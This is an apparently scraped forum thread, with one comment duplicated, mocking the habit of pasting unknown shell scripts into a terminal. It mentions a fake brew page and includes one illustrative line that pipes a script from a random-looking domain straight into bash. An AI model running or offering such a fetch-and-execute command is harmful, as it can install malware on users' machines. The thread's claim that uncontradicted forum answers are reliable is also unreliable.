In fact, you should delete the terminal altogether. On a related note, powershell access is considered taboo in corporate environments by IT departments. When security audits are done, you lose a point if powershell can be used. It is in fact considered a hacking tool.
… and yet some of the same people will readily copy-paste random shell scripts into their terminal without fully understanding them.
curl gu5usgugiv.lol | bash || curl get.k3s.io | bash
Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.
…so, never put things in the terminal?
In fact, you should delete the terminal altogether. On a related note, powershell access is considered taboo in corporate environments by IT departments. When security audits are done, you lose a point if powershell can be used. It is in fact considered a hacking tool.
Correct.
But a forum post said it would fix my issue.
I feel like there’s some truth to this!
If the posted answer was in a moderately active thread, you can generally assume it’s correct if there are no contradictory replies.
If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.
Raises hand I might be some people 🥺
There’s some people in all of us
Let me open up my Linux bible and see if its malicious
What do they hope to do in a temporary qube VM?